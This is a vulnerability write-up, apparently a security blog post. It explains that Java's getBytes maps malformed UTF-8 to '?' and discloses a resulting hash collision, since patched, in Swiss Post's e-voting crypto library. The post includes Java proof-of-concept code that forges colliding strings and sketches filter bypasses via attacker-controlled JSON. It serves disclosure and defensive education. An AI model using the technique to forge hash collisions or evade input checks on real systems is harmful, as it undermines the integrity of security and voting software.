
Beware of Java's String.getBytes

Sometimes there are subtle bugs whose origin lies in quirks of the underlying language used to build the software. This blog post describes one of those cases, so that fellow security researchers and developers who didn't know about it become aware of this potentially vulnerable pattern. In fact, I'm pretty sure that bugs similar to the one described here affect a number of products and codebases out there.

In previous posts, I've already described some bugs in the Swiss Post's future E-voting system. While reading their Crypto-Primitives specification, which among other things describes the custom Hashing algorithm Swiss Post implemented, I noticed something potentially interesting.

Basically, four different types are supported: byte arrays, strings, integers and vectors. Before being hashed, strings are converted to a byte array via the 'StringToByteArray' algorithm.

However, comparing 'StringToByteArray' and 'ByteArrayToString' reveals a significant difference: invalid UTF-8 sequences are only checked for in the latter. Let's see how this was implemented in the code:

File: crypto-primitives-master/src/main/java/ch/post/it/evoting/cryptoprimitives/internal/utils/
079:    /**
080:     * See {@link}
081:     */
082:    public static byte[] stringToByteArray(final String s) {
083:        checkNotNull(s);
085:        // Corresponds to UTF-8(S)
086:        return s.getBytes(StandardCharsets.UTF_8);
087:    }
089:    /**
090:     * See {@link}
091:     */
092:    public static String byteArrayToString(final byte[] b) {
093:        checkNotNull(b);
094:        checkArgument(b.length > 0, "The length of the byte array must be strictly positive.");
096:        CharsetDecoder decoder = StandardCharsets.UTF_8.newDecoder();
097:        // The try-catch clause implements the pseudo-code's if statement
098:        try {
099:            // Corresponds to UTF-8^-1(B)
100:            return decoder.decode(ByteBuffer.wrap(b)).toString();
101:        } catch (CharacterCodingException ex) {
102:            throw new IllegalArgumentException("The byte array does not correspond to a valid sequence of UTF-8 encoding.");
103:        }
104:    }

As expected, at line 100, 'byteArrayToString' tries to decode the input to detect invalid UTF-8 sequences. On the other hand, at line 86, 'StringToByteArray' directly uses 'getBytes'.

Internally, 'getBytes' will encode the string before returning the bytes. Let's see Java's implementation:

File: java/lang/

    /**
     * Encodes this {@code String} into a sequence of bytes using the given
     * {@linkplain java.nio.charset.Charset charset}, storing the result into a
     * new byte array.
     *
     * <p> This method always replaces malformed-input and unmappable-character
     * sequences with this charset's default replacement byte array.  The
     * {@link java.nio.charset.CharsetEncoder} class should be used when more
     * control over the encoding process is required.
     *
     * @param  charset
     *         The {@linkplain java.nio.charset.Charset} to be used to encode
     *         the {@code String}
     *
     * @return  The resultant byte array
     *
     * @since  1.6
     */
    public byte[] getBytes(Charset charset) {
        if (charset == null) throw new NullPointerException();
        return encode(charset, coder(), value);
    }
As the method's description clearly states, any invalid character sequence is replaced with the charset's default replacement byte array (the behavior of onMalformedInput(CodingErrorAction.REPLACE) and onUnmappableCharacter(CodingErrorAction.REPLACE)); no exception is thrown.

In Java, the default replacement for a CharsetDecoder is one of the Unicode 'Specials': the replacement character (U+FFFD). However, for some reason Java's UTF-8 CharsetEncoder uses '?' (0x3F) as its default replacement byte array.

File: 'sun.nio.cs.UTF_8'
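This behavior can be observed directly (a minimal sketch; the class name is mine):

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;

public class ReplacementDemo {
    public static void main(String[] args) {
        // An unpaired surrogate cannot be encoded as UTF-8, yet
        // getBytes silently substitutes '?' (0x3F) instead of throwing
        byte[] out = "\uD800".getBytes(StandardCharsets.UTF_8);
        System.out.println(Arrays.toString(out)); // [63]
    }
}
```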

This behavior does not seem to comply with Unicode's security recommendations.

It also differs from other languages, such as C#, which follows the best practice: Encoding.UTF8.GetBytes replaces the malformed character sequence with the UTF-8 encoding (0xEF 0xBF 0xBD) of the replacement character.
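For completeness, Java can be made to follow the same recommendation: a CharsetEncoder accepts a custom replacement byte array, so one can opt into the U+FFFD behavior explicitly (a sketch; the class name is mine):

```java
import java.nio.ByteBuffer;
import java.nio.CharBuffer;
import java.nio.charset.CharsetEncoder;
import java.nio.charset.CodingErrorAction;
import java.nio.charset.StandardCharsets;

public class FffdEncoder {
    public static void main(String[] args) throws Exception {
        // Replace malformed/unmappable input with the UTF-8 encoding of U+FFFD
        CharsetEncoder encoder = StandardCharsets.UTF_8.newEncoder()
                .onMalformedInput(CodingErrorAction.REPLACE)
                .onUnmappableCharacter(CodingErrorAction.REPLACE)
                .replaceWith(new byte[] {(byte) 0xEF, (byte) 0xBF, (byte) 0xBD});
        ByteBuffer out = encoder.encode(CharBuffer.wrap("A\uD800B"));
        while (out.hasRemaining()) {
            System.out.printf("%02x ", out.get()); // 41 ef bf bd 42
        }
        System.out.println();
    }
}
```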


This specific pattern may result in different attack scenarios, depending on the logic where the vulnerable pattern has been identified.

Swiss Post E-Voting 

In this specific case, what we end up with is a hash collision vulnerability.
The following PoC demonstrates how two different strings are not injectively encoded, thus leading to a potential hash collision according to the 'RecursiveHash' algorithm.

import java.nio.ByteBuffer;
import java.nio.CharBuffer;
import java.nio.charset.CharacterCodingException;
import java.nio.charset.CharsetEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;

public class poc {

    // A strict CharsetEncoder: unlike getBytes, it throws on malformed input
    public static void encode(String string) throws CharacterCodingException {
        CharsetEncoder encoder = StandardCharsets.UTF_8.newEncoder();
        ByteBuffer encoded = encoder.encode(CharBuffer.wrap(string.toCharArray()));
        System.out.println("\nEncoding end");
    }

    public static void printhex(byte[] ars) {
        for (int i = 0; i < ars.length; i++) {
            System.out.printf("%02x ", ars[i]);
        }
        System.out.println();
    }

    // Same implementation as Swiss Post's 'stringToByteArray'
    public static byte[] stringToByteArray(final String s) {
        return s.getBytes(StandardCharsets.UTF_8);
    }

    // Builds a String from the custom '+UXXXX' notation used below
    public static String buildCustomString(String dat) {
        StringBuilder badString = new StringBuilder();
        for (String s : dat.split("\\+U")) {
            if (s.isEmpty()) {
                continue;
            }
            try {
                badString.append((char) Integer.parseInt(s, 16));
            } catch (NumberFormatException e) {
                System.out.println("Error parsing int");
            }
        }
        return badString.toString();
    }

    public static String DumpInfo(String inf) {
        System.out.println("=>> Original string (custom format): \"" + inf + "\"");
        System.out.println("[+] Building String");
        String badString = buildCustomString(inf);

        System.out.println("[+] String badString => \"" + badString + "\"");
        System.out.print("[+] badString.toCharArray() =>\t\t");
        char[] chars = badString.toCharArray();
        for (int i = 0; i < chars.length; i++) {
            System.out.printf("%04x ", (int) chars[i]);
        }
        System.out.println();

        System.out.print("[+] stringToByteArray(badString) =>     ");
        printhex(stringToByteArray(badString));

        return badString;
    }

    public static void main(String[] args) {
        String base = "Question_1?";

        // +UD8AF is an unpaired surrogate, illegal in UTF-8,
        // so it will be mapped to '?' by getBytes
        String data1 = "+U0051+U0075+U0065+U0073+U0074+U0069+U006f+U006E+U005f+U0031+UD8AF";

        String badString1 = DumpInfo(data1);

        System.out.println("[+] badString after UTF-8 encoding: \""
                + new String(stringToByteArray(badString1), StandardCharsets.UTF_8) + "\"");
        System.out.print("[+] stringToByteArray(base) =>   \t");
        printhex(stringToByteArray(base));

        if (Arrays.equals(stringToByteArray(badString1), stringToByteArray(base))) {
            System.out.println("[+] Identical byte arrays => same 'RecursiveHash' input => collision");
        }
        if (!badString1.equals(base)) {
            System.out.println("[+] 'badString' and 'base' are not equal");
        }

        try {
            // This will trigger an exception: a strict encoder rejects the surrogate
            encode(badString1);
        } catch (Exception e) {
            System.out.println("[!] Strict encoding failed: " + e);
        }
    }
}

In the PoC there are two strings, 'base' and 'badString'. The first one is a valid string that contains "Question_1?", while the latter contains "Question_1" plus a malformed sequence: the unpaired UTF-16 surrogate '\uD8AF', which cannot be encoded as UTF-8.

When 'stringToByteArray' is invoked on 'badString', its illegal sequence is substituted by '?', resulting in the same hash that would be generated for the 'base' string. However, before being encoded, those strings are different, as can be checked in the 'toCharArray()' and 'equals' comparisons. This is important for potentially bypassing certain checks, as 'equals' operates at the char array level.

The output of the PoC shows that both byte arrays are identical, even though the input strings differ.

Swiss Post confirmed the bug (#YWH-PGM232-122), which has been patched in version 1.3.0.

Other products

The fact that Java's UTF-8 encoder replaces a malformed character sequence with a valid one, '?', which in turn plays an important role in URLs, makes me think that, in addition to the potential cryptographic issues we have already seen, this vulnerable pattern might be used to bypass certain security-related logic.

As long as the attacker controls the string, for instance after deserializing attacker-controlled JSON with Jackson, there is a chance to abuse Java's 'getBytes' replacement logic.

 ObjectMapper objectMapper = new ObjectMapper();
 String json = "{ \"badString\" : \"Question_1\\uD84F\" }";
 JsonNode jsonNode = objectMapper.readTree(json);
 String badString = objectMapper.readValue(jsonNode.get("badString").toString(), String.class);
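To illustrate the bypass angle without Jackson, here is a hypothetical char-level filter (the check and class name are mine, not from any real product): it rejects strings containing '?', yet passes the malformed input, whose encoded form does contain one:

```java
import java.nio.charset.StandardCharsets;

public class FilterBypass {
    public static void main(String[] args) {
        // e.g. a value obtained from attacker-controlled JSON
        String input = "Question_1\uD84F";

        // Hypothetical security check performed on chars: no '?' present, so it passes
        if (input.indexOf('?') >= 0) {
            throw new IllegalArgumentException("rejected");
        }

        // Later, the string is encoded: getBytes silently turns the surrogate into '?'
        byte[] encoded = input.getBytes(StandardCharsets.UTF_8);
        System.out.println(new String(encoded, StandardCharsets.UTF_8)); // Question_1?
    }
}
```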

If you happen to stumble upon a product with such a vulnerability, I would love to hear about it.
